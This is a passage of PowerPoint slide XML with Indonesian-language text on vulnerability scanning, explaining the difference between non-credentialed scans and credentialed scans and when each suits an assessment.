              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengarahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> uji </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tampilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperoleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tampilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditampilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Rutinitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal-hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkadang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempersempit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpikir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> total. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> perimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rutinitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semacam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
